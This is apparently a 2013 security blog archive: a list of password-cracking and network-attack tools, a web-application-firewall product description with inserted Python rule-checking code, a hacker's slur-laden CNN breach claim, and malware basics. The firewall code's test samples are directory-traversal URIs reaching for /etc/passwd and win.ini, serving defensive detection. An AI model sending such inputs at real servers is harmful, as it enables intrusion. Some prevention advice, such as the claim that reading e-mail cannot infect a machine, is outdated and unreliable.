Yersinia is a network tool designed to take advantage of some weaknesses in different Layer 2 protocols. It aims to be a solid framework for analyzing and testing deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).

The best Layer 2 kit there is.

Get Yersinia Here

9. Eraser

Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.

An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.

Get Eraser Here.

10. PuTTY

PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4x0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.

Get PuTTY Here.

11. LCP

The main purpose of LCP is auditing and recovery of user account passwords in Windows NT/2000/XP/2003: account information import, password recovery, brute-force session distribution, and hash computing.

A good free alternative to L0phtcrack.

LCP was briefly mentioned in our well read Rainbow Tables and RainbowCrack article.

Get LCP Here

12. Cain and Abel

My personal favourite for password cracking of any kind.

Cain & Abel is a password recovery tool for Microsoft operating systems. It allows easy recovery of various kinds of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.

Get Cain and Abel Here

13. Kismet

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.

A good wireless tool as long as your card supports rfmon (look for an Orinoco Gold).

Get Kismet Here

14. NetStumbler

Yes, a decent wireless tool for Windows! Sadly not as powerful as its Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving.

NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:
Verify that your network is set up the way you intended.
Find locations with poor coverage in your WLAN.
Detect other networks that may be causing interference on your network.
Detect unauthorized “rogue” access points in your workplace.
Help aim directional antennas for long-haul WLAN links.
Use it recreationally for WarDriving.

Get NetStumbler Here

15. hping

To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills.

hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired by the unix ping command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files over a covert channel, and many other features.

Get hping Here

Thursday, 23 May 2013

How Do Computer Viruses Work?

This is a simple video about how computer viruses work.






And this is simply how antivirus software works, in a funny way.


Latest Technology in Firewalls

First of all, we need to know what a firewall is.

A firewall is a software- or hardware-based network security system that controls incoming and outgoing network traffic by analyzing the data packets and determining whether they should be allowed through or not, based on a rule set. A network's firewall builds a bridge between the internal network or computer it protects, which is assumed to be secure and trusted, and another network, usually an external (inter)network such as the Internet, that is not assumed to be secure and trusted.
Many personal computer operating systems include software-based firewalls to protect against threats from the public Internet. Many routers that pass data between networks contain firewall components and, conversely, many firewalls can perform basic routing functions.


------------------------------------------------------------------------


And here is the latest hardware firewall technology 



ve been the number one target of hackers. Companies, organizations, and governments that utilize the internet for commerce and communication are at risk of having vital private, proprietary, secret, and/or confidential information leaked via their web applications. Web attacks grow more sophisticated every day. As such, it can be difficult to find a security product that can accurately detect and block both known and unknown attacks – including the top ten critical threats against web applications outlined by OWASP – while minimizing the administrative burden without hampering system performance. However, WAPPLES – the web application firewall from Penta Security – can accomplish those things.

Detects and blocks website attacks


Prevents website defacement and counterfeit websites
Prevents web attacks designed to steal information
Provides real-time monitoring and security alerts
Enables High Availability (HA) to prevent any service disruptions
Offers easy and convenient installation and management
Reduces web application security management costs
Optimizes speed of service by blocking unnecessary traffic

Operates on a logic analysis based engine


Capable of detecting both known and previously unknown attacks

Extremely low rate of false positives compared to other products

Does not strain the pre-existing system


Can be installed using a variety of methods that do not place an extra load on the system.
In case there is a hardware problem, the BYPASS feature provides continued service without any disruptions.
WAPPLES can be installed in various network configurations, including in-line, reverse proxy, transparent proxy, and High Availability (HA).

Convenient

Highly skilled administrative staff are not required to operate WAPPLES, due to the combination of its easy-to-use GUI and the intelligent logic analysis based engine.
As WAPPLES itself, not an administrator, is responsible for both detecting attacks and determining and launching appropriate countermeasures, the burden on administrative staff is minimal.

Offers flexible, real-time management

WAPPLES allows administrators to monitor equipment operation status as well as security threats in real-time.
WAPPLES offers customizable reporting, which can provide a variety of statistical data.


Transparent Proxy Method


The web server and firewall are installed and managed using an In-Line method
Ability to install without changing the network setup
Change in web server IP and DNS are not needed
Web client IP is preserved and conveyed to the web server
Supports the Bypass feature


Reverse Proxy Method

DNS resolves the web server’s name to the WAPPLES IP address, so clients connect to WAPPLES rather than to the web server directly
Prevents exposure of the internal web server and web application server configuration
Cloaking effect
The web client’s IP address is replaced by the WAPPLES IP address before the request is conveyed to the web server
The X-Forwarded-For header can be configured to preserve and convey the client IP
Only HTTP traffic is allowed to pass through, providing stronger website security
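A consequence of the reverse proxy method worth spelling out: the web server sees every request arriving from the WAPPLES address, and the real client address survives only in the X-Forwarded-For header the proxy appends. The following is an added example (not Penta Security's code) of how a backend should recover that address; it assumes a hypothetical proxy address of 203.0.113.10 and uses constructed requests. Anything a client placed in the header before the proxy appended to it is untrusted, so the address to log, rate-limit or IP-filter on is the right-most one that does not belong to a trusted proxy.

```python
import ipaddress
from typing import Dict

# Assumed inside address of the WAF in reverse-proxy mode (constructed value
# from the documentation range; a real deployment lists its own proxies here).
TRUSTED_PROXIES = {ipaddress.ip_address("203.0.113.10")}


def client_ip(peer_ip: str, headers: Dict[str, str]) -> str:
    """Return the address the backend should log, rate-limit or IP-filter on.

    peer_ip  -- the TCP peer of this connection as the web server sees it
    headers  -- request headers; names are matched case-insensitively
    """
    peer = ipaddress.ip_address(peer_ip)
    forwarded = next(
        (v for k, v in headers.items() if k.lower() == "x-forwarded-for"), None
    )
    if peer not in TRUSTED_PROXIES or not forwarded:
        # Not via the proxy, or no header at all: the TCP peer is the only
        # honest source.  This also covers a client that connected directly
        # and set X-Forwarded-For itself in the hope of spoofing its address.
        return str(peer)
    hops = [h.strip() for h in forwarded.split(",") if h.strip()]
    # The proxy appends the address it saw to the END of the list; everything
    # to the left arrived inside the client's own request and may be forged.
    # Walk from the right, skip further trusted proxies, take the first outsider.
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return str(peer)  # malformed header: fall back to the peer address
        if addr not in TRUSTED_PROXIES:
            return str(addr)
    return str(peer)  # every hop was one of ours; nothing better than the peer


if __name__ == "__main__":
    # Constructed sample connections: (TCP peer, headers)
    samples = [
        ("203.0.113.10", {"X-Forwarded-For": "198.51.100.7"}),
        ("203.0.113.10", {"X-Forwarded-For": "10.0.0.1, 198.51.100.7"}),
        ("198.51.100.7", {"X-Forwarded-For": "10.0.0.1"}),  # bypassed the proxy
    ]
    for peer, hdrs in samples:
        print(peer, hdrs, "->", client_ip(peer, hdrs))
```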


Reverse Proxy Method (CSLB)

Utilizes the L4 switch Cache Server Load Balancing (CSLB) feature
Uses the CSLB configuration to differentiate web traffic
Ability to utilize L4 switch’s Health Check feature
Suitable for dual networks and complex environments



Product Features

WAPPLES runs on an intelligent logic analysis engine called Contents Classification and Evaluation Processing, or COCEP. This logic analysis engine utilizes a system of 26 ‘rules’ (see below for detailed explanations of each rule) to execute a logical analysis of all types of traffic. This analysis enables WAPPLES to determine whether or not the traffic constitutes a threat to the web application, and to take appropriate countermeasures when threats are detected. If traffic can successfully pass through all 26 rules, WAPPLES determines that the traffic is not an attack, and transports the data to the web application. The split-second performance of the COCEP enables WAPPLES to determine if traffic is safe in just 1/1000 of a second, leaving system performance unaffected.

- Buffer Overflow: Blocks invalid requests that cause buffer overflow attacks
- Cookie Poisoning: Blocks the falsification of cookies containing authentication information
- Cross Site Scripting: Blocks malicious script code that could be executed by the client
- Directory Listing: Blocks the leakage of a web site’s directories and files
- Error Handling: Controls error messages so as to avoid exposing information about the web server, WAS, DBMS server, etc.
- Extension Filtering: Blocks access to files that do not have permitted file extensions
- File Upload: Blocks the upload of files that can be executed on the web server
- Include Injection: Blocks the injection of untrustworthy files and external URIs
- Input Content Filtering: Blocks or substitutes words that are not permitted on a web site
- Invalid HTTP: Blocks access not in compliance with HTTP standards
- Invalid URI: Blocks access not in compliance with standard URI syntax
- IP Black List: Blocks a source IP when more than a user-set number of access attempts from it are detected within a user-set time window
- IP Filtering: Blocks access from specific IP ranges or countries (set by user)
- Parameter Tampering: Blocks attacks that send maliciously manipulated parameters to websites
- Privacy File Filtering: Blocks leakage of private information from files transmitted from the web server
- Privacy Input Filtering: Blocks leakage of private information via HTTP requests
- Privacy Output Filtering: Blocks leakage of private information via HTTP responses
- Request Header Filtering: Blocks HTTP requests whose headers are missing important information or have been abnormally modified, such as requests from automated attack tools and other abnormal HTTP requests
- Request Method Filtering: Blocks risky HTTP request methods
- Response Header Filtering: Blocks leakage of web server information via HTTP responses
- SQL Injection: Blocks requests that inject SQL query statements
- Stealth Commanding: Blocks requests that try to execute commands on the web server through an HTTP request
- Suspicious Access: Blocks access that does not fit a standard web browser request
- Unicode Directory Traversal: Blocks requests that access directories and files using vulnerabilities related to the web server’s Unicode handling
- URI Access Control: Controls requests to access specific URIs and files
- Website Defacement: Detects defacement of websites and recovers the web page
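To make concrete what a rule in a list like the one above actually has to examine, here is an added example (not Penta Security's code, and not how COCEP is implemented) of a miniature rule engine that applies five of the listed rules to a parsed HTTP request. The allowed methods, denied extensions and overlong-UTF-8 mappings are assumed policy values, and the sample requests are constructed; the Unicode Directory Traversal check shows why a path must be fully decoded before it can be judged.

```python
import re
from typing import Dict, List
from urllib.parse import unquote_to_bytes

# Assumed policy values (a real deployment sets these per site).
ALLOWED_METHODS = {"GET", "POST", "HEAD"}                        # Request Method Filtering
DENIED_EXTENSIONS = {".bak", ".old", ".sql", ".inc", ".config"}  # Extension Filtering
URI_RE = re.compile(r"^/[A-Za-z0-9._~!$&'()*+,;=:@%/?-]*$")      # Invalid URI
# Overlong UTF-8 forms of '/', '.' and '\' that a naive decoder may accept.
OVERLONG = {b"\xc0\xaf": b"/", b"\xe0\x80\xaf": b"/", b"\xc0\xae": b".", b"\xc1\x9c": b"\\"}


def decode_uri(raw: str) -> str:
    """Decode %XX and %uXXXX escapes until the text stops changing (bounded),
    so double encoding and overlong sequences cannot hide a '../'."""
    text = raw
    for _ in range(3):  # bounded: never loop indefinitely on attacker-controlled input
        step = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), text)
        data = unquote_to_bytes(step)
        for bad, good in OVERLONG.items():
            data = data.replace(bad, good)
        step = data.decode("utf-8", errors="replace")
        if step == text:
            break
        text = step
    return text.replace("\\", "/")  # treat backslash as a separator, as IIS does


def escapes_root(path: str) -> bool:
    """Unicode Directory Traversal: resolve '.' and '..' segment by segment
    and report whether the path ever climbs above the document root."""
    depth = 0
    for segment in path.split("?", 1)[0].split("/"):
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        elif segment not in ("", "."):
            depth += 1
    return False


def evaluate(request: Dict) -> List[str]:
    """Return the names of the rules a request violates (empty list = pass)."""
    hits: List[str] = []
    headers = {k.lower(): v for k, v in request["headers"].items()}
    if request["method"].upper() not in ALLOWED_METHODS:
        hits.append("Request Method Filtering")
    if not URI_RE.match(request["uri"]):
        hits.append("Invalid URI")
    decoded = decode_uri(request["uri"])
    if escapes_root(decoded):
        hits.append("Unicode Directory Traversal")
    path = decoded.split("?", 1)[0]  # the query string is not a file name
    if any(path.lower().endswith(ext) for ext in DENIED_EXTENSIONS):
        hits.append("Extension Filtering")
    if "host" not in headers or "user-agent" not in headers:
        hits.append("Request Header Filtering")
    return hits


# Constructed sample requests (not captured traffic).
BROWSER = {"Host": "www.example.test", "User-Agent": "Mozilla/5.0"}
SAMPLES = [
    {"method": "GET", "uri": "/index.php?page=1", "headers": BROWSER},
    {"method": "GET", "uri": "/..%c0%af..%c0%afwindows/win.ini", "headers": BROWSER},
    {"method": "GET", "uri": "/%252e%252e/%252e%252e/etc/passwd", "headers": BROWSER},
    {"method": "GET", "uri": "/images/../logo.png", "headers": BROWSER},
    {"method": "TRACE", "uri": "/", "headers": {"Host": "www.example.test"}},
    {"method": "GET", "uri": "/backup/site.SQL", "headers": BROWSER},
]

if __name__ == "__main__":
    for sample in SAMPLES:
        verdict = evaluate(sample)
        print(f'{sample["method"]} {sample["uri"]}: {verdict or "pass"}')
```

Note that `/images/../logo.png` passes: it never leaves the document root, which is exactly the distinction a traversal rule has to make rather than flagging every `..`.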





CNN Hacked !!!

HACKING NEWS !





CNN Got Hacked 




Hacker Reckz0r leaked nine admin user names and encrypted passwords, and claims to have published four fake articles on the site.

Hacker Reckz0r recently claimed to have breached CNN's International Web site, published four fake articles on the site, and leaked nine admin user names and encrypted passwords (h/t Cyber War News).

In a Pastebin post, Reckz0r wrote, "Sup? It's been a long f**kin' time, my friends, Today. I shall show you that silence is golden when you're trying to tap into more systems, and leak more crap. My target was 'CNN'. 'Why?', you must say? because they're a bunch of f**king f**gots trying to spread false news, your 9/11 is our 24/7. I strongly respect the Palestinian brotherhood, and it seems like CNN is on Israel's side. and you do know one thing; 'Whenever you see somebody supporting CNN, pwn him at sight.' Their systems are poorly-misconfigured, just like how NASA's DIRS is full of crap. CNN is no different from them, anyway. nuff' talkin' - Let the good ol' show begin. PUZZLE: I wrote 4 fake articles on edition.cnn.com, if you can guess what articles are those, I shall give you a crown, plus full-backup of CNN<3"

It's not clear where the four fake articles are, if they exist at all. In addition to the admin user names and passwords, Reckz0r posted a list of database tables and other information.

Twitter Intros Two-Factor Authentication


After a long series of embarrassing account breaches, Twitter today introduced login verification, a form of two-factor authentication (h/t GigaOM).
To activate the new functionality (and you should, as soon as possible), users are advised to visit their account settings page, scroll down to Account security, click on the link (and follow the instructions) to "add a phone," then select "Require a verification code when I sign in."
Once login verification is enabled, you'll receive a six-digit code via text message whenever you attempt to sign in -- that code will have to be entered along with your password in order to access your account.
"This release is built on top of Twitter via SMS, so we need to be able to send a text to your phone before you can enroll in login verification (which may not work with some cell phone providers)," Twitter's Jim O'Leary wrote in a blog post. "However, much of the server-side engineering work required to ship this feature has cleared the way for us to deliver more account security enhancements in the future. Stay tuned."

Monday, 20 May 2013

Internet Security

Introduction

  • The digital world is changing at a tremendous speed. New communication technologies open up new possibilities, but by using them you can also expose yourself, and others, to risks. Many people have trouble assessing these risks, especially with regard to the subject of safe digital communication. This is particularly true for people working in regimes with high levels of censorship. However, also in countries considered to be relatively free and uncensored, your data can be used or misused by others - governments, companies, or other persons (sometimes even unintentionally).
  • How do you protect yourself, your sources or your friends? What are safe routes to take? How do you secure your personal data? This blog aims to address these issues to help you choose your own 'level' of safety.


What is internet security?


  • When a computer connects to a network and begins communicating with others, it is taking a risk. Internet security involves the protection of a computer's internet account and files from intrusion by an unknown user.
  • Basic security measures involve protection by well-selected passwords, changing file permissions and backing up the computer's data.

What are the risks?

-Vulnerabilities
-Trojan horses
-Worms
-Viruses
-Keyloggers
-Sniffers
-Phishing




------------------------------------------------------------------------

-Vulnerabilities

   A vulnerability is a flaw or weakness in a system's design, implementation, or operation and management that could be exploited to violate the system's security policy.

-Trojan horses

   A Trojan horse, or Trojan, is a non-self-replicating type of malware which appears to perform a desirable function but instead drops a malicious payload, often including a backdoor allowing unauthorized access to the target's computer. These backdoors tend to be invisible to average users. Trojans do not attempt to inject themselves into other files like a computer virus does. Trojan horses may steal information, or harm their host computer systems. Trojans may use drive-by downloads or install via online games or internet-driven applications in order to reach target computers. The term is derived from the Trojan Horse story in Greek mythology, because Trojan horses employ a form of "social engineering", presenting themselves as harmless, useful gifts, in order to persuade victims to install them on their computers.



-Worms

   A computer worm is a standalone malware computer program that replicates itself in order to spread to other computers. Often, it uses a computer network to spread itself, relying on security failures on the target computer to access it. Unlike a computer virus, it does not need to attach itself to an existing program. Worms almost always cause at least some harm to the network, even if only by consuming bandwidth, whereas viruses almost always corrupt or modify files on a targeted computer.

-Viruses


   A  computer virus is a program or piece of code that is loaded onto your computer without your knowledge and runs against your wishes. Viruses can also replicate themselves. All computer viruses are man-made. A simple virus that can make a copy of itself over and over again is relatively easy to produce. Even such a simple virus is dangerous because it will quickly use all available memory and bring the system to a halt. An even more dangerous type of virus is one capable of transmitting itself across networks and bypassing security systems.

  -Keyloggers

      A keylogger is a type of surveillance software (considered to be either software or spyware) that has the capability to record every keystroke you make to a log file, usually encrypted. A keylogger recorder can record instant messages, e-mail, and any information you type at any time using your keyboard. The log file created by the keylogger can then be sent to a specified receiver. Some keylogger programs will also record any e-mail addresses you use and Web Site URLs you visit.
Software Keylogger

Hardware Keylogger

-Sniffers

   Network sniffers monitor data flowing over computer network links. A sniffer can be a self-contained software program or a hardware device with the appropriate software or firmware. Also sometimes called "network probes" or "snoops," sniffers examine network traffic, making a copy of the data without redirecting or altering it. Some sniffers work only with TCP/IP packets, but the more sophisticated tools can work with many other protocols and at lower levels, including Ethernet frames.


   -Phishing

   Phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware.[1] Phishing is typically carried out by e-mail spoofing[2] or instant messaging,[3] and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users,[4] and exploits the poor usability of current web security technologies.[5] Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.
Link Manipulation
Fake Ads



What can I do to protect myself from computer viruses and Trojans?

These days, practically everyone's online, downloading and exchanging files, and developers are in such a hurry to get their Web sites up or their files out that checking for a nasty bug is more of a courtesy than a requirement. If you're not careful, your computer can end up with a nasty virus that makes your files act oddly, crashes your computer, pops up bizarre messages, or worst of all, destroys your operating system.

A computer virus is the most subtle of computer problems. It usually loads itself into your computer system when you run a program to which it has attached itself. From the computer system, it'll then reproduce itself, much like a biological virus would, by attaching copies of itself to other programs on your hard drive. What it does then depends on the malevolence of its creator. Some viruses are nothing more than a practical joke. They may bring up a message like "Merry Xmas" or melt your display. Most of them though, either start destroying your system or your files immediately or on a date specified by their creators—like the much-publicized Michelangelo virus, which erases important pieces of your system on March 6. "Trojan horse" programs are similar to viruses in their effect on your system, but they can't reproduce themselves. They're usually a program disguised as something you might want to download onto your computer—for instance, a rogue, modified version of PKWare's PKZIP utility. But when you run the new program you just found, it can do anything from popping up a message to erasing your hard disk, as the rogue PKZIP utility really did.

In either case, you have to actually launch the infected program or the trojan horse for it to infiltrate your system. Though hoax e-mails, like the one about the "Good Times" virus try to make you believe otherwise, neither a virus nor a trojan horse program can do anything if you simply leave the malevolent file sitting on your hard drive.

Finding out that you copied a trojan horse onto your computer is remarkably easy. You launch the program, and the next thing you know, something completely unexpected happens—maybe your system is gone or your computer is laughing maniacally at you. But unless you notice your computer acting oddly before the virus has done its worst damage, you may very well not know you have it until it's too late.

   

   Protect Yourself


There are a few basic rules that computer users should follow to short-circuit viruses. The best known bit of advice is this: Never open any attachment unless you know who it's from and why they are sending it. Refusing to open unsolicited e-mail of any kind is the only sure-fire way to sidestep all forms of trouble.

Anti-virus software is crucial to preventing virus attacks, but this strategy only works if users update their software. Unfortunately, 'keeping it current' means updating it at least weekly. Most products today allow one to automate this process, but file downloads can be large and slow.

Factors to consider when buying an anti-virus package include cost, quality of tech support, how frequently the package self-updates and the platforms supported by the program.

Common sense is another good weapon in the fight against viruses. Be wary of opening any email attachments, even from your friends, especially if it has been forwarded to them. Set up your anti-virus product so that it automatically scans incoming e-mail, and avoid e-mail software that allows automatic launching of attachments.

If all of this sounds like a lot of work, it is. There is always a tradeoff between ease of use and security, but the extra time you spend updating your anti-virus software now will save you hours of time and buckets of frustration later. If you don't keep it updated, you might as well be completely unprotected.




  Prevention

1. Be sure to do a full backup of your system on a regular basis. The best way to clean up an infected file is to replace it with an original, non-infected file. Not to mention the grief a current backup will save if a virus takes your system completely down. It's also a good idea to keep more than one set of backups in case the current one is infected before the virus is detected.

2. Always use an anti-virus software program, one with both an on-demand and an on-access scanner. You'll want to look for one that has a fairly complete database of viruses and that is updateable. New viruses are produced daily, so it's important to have software that can detect the latest threat.

Be sure to read the manual and follow the directions of the software program to ensure it's protecting you properly. Also, consider buying and using two different brands to be doubly protected. See our review of anti-virus programs.

3. Update the virus database in your anti-virus program regularly (each month or by the direction of the manufacturer).

4. Don't allow your web browser to automatically run programs, such as MS Word or other programs, through its e-mail program. Configure your browser to launch WordPad or Notepad instead. One of the biggest and growing threats is the macro virus, which is spread through word processing and spreadsheet programs.

5. Configure your web browsers to disable ActiveX, Java, and Javascript. You'll lose some of the fun the Web's been known for, but you'll save your computer from contracting a virus and speed up your connection.

6. Know that the only way a virus spreads is either by launching an infected file or by booting an infected disk. You can not get a virus by simply being online or by reading e-mail. You have to download and launch an infected file before it will spread. Therefore, do not launch any unsolicited executable files sent via e-mail.

7. Using an updated anti-virus program, scan all new software for viruses before installing them on your hard drive. Even shrink-wrapped software from major publishers has been known to contain viruses.

8. Be aware of hoaxes. To increase mass hysteria, there have been many stories conjured up and spread by unacknowledged users. For a list of known hoaxes check out the following site: http://www.symantec.com/business/security_response/threatexplorer/risks/hoaxes.jsp

Viruses are not the only type of program written solely to cripple computer systems or to use a computer in an unauthorized way. As I mentioned, other malicious programs include logic bombs, Trojan horses, and worms.